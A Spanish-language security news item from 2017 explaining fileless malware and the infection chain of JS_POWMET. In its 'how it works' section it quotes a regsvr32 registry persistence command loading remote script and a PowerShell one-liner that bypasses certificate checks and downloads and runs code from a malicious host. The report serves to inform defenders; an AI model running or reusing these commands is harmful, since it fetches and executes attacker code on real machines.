Global Preloader
Noticia Internacional
(10/Aug/2017) JS_POWMET, un malware sin malware

JS_POWMET, un malware sin malware

El pasado 24 de julio el equipo de Trend Micro anunciaba la detección de JS_POWMET, un malware completamente "fileless" que realiza toda su actividad desde la memoria, sin escribir ni dejar rastro en el disco duro de la víctima.

¿Qué es el malware "fileless"?

Fileless malware, o malware sin archivos, es un tipo de malware que se instala y se ejecuta en memoria. No necesita escribir ningún dato en el disco duro de la víctima para ejecutar su payload, lo que dificulta enormemente su detección.

Este tipo de familias se conocen como "Advanced Volatile Threats (AVT)" y suelen estar orientadas al robo de información valiosa y propiedad intelectual de empresas, bancos y gobiernos.

Este concepto de malware "sin archivos" no es nuevo. De hecho el primer "fileless malware" data de 1987: conocido como Lehigh, infectaba el archivo COMMAND.COM y se instalaba en la memoria. Desde allí buscaba otros archivos COMMAND.COM y los infectaba. Cuando había realizado cuatro infecciones sobreescribía el sector de arranque y la tabla de asignación de archivos.

La mayoría de esta clase de malware termina realizando algún tipo de escritura en disco cuando ejecutan su payload. Son sólo "fileless" durante la fase de infección.

JS_POWMET sin embargo no realiza ninguna escritura durante su ciclo de vida, lo que lo hace particularmente interesante.

Cómo funciona JS_POWMET

El malware llega al sistema a través de un malware intermedio que añade una entrada al registro de arranque de Windows:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

COM+ = “regsvr32 /s /n /u /i:{URL al XML malicioso} scrobj.dll”

Este comando ejecutará cada vez que se inicie la máquina un Javascript malicioso contenido en un XML remoto, sin necesidad de guardarlo en el disco duro.

Una vez ejecutado, JS_POWMET descargará el archivo "TROJ_PSINJECT", un script para Powershell que descargará y desencriptará otro fichero: "favicon" desde la URL https://bogerando.ru/favicon.

%System%\WindowsPowerShell\v1.0\powershell.exe -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; iex ((New-Object System.Net.WebClient).DownloadString('https://{BLOCKED}ndo.ru/p1'));

Una vez descifrado, el archivo "favicon" se inyectará por medio de "ReflectivePELoader" en el proceso "TROJ_PSINJECT", todo esto sin guardar ningún archivo en el disco duro.

A continuación el malware volverá a descifrar el archivo "favicon" utilizando una clave RC4 hardcodeada en el código del malware. Esto da lugar a una nueva DLL maliciosa, "BKDR_ANDROM" que se inyectará en el proceso que ejecuta Powershell.

BKDR_ANDROM recopilará información sensible sobre el sistema y la enviará al servidor C&C antes de cerrar todos los procesos powershell.exe y borrar todo rastro del malware.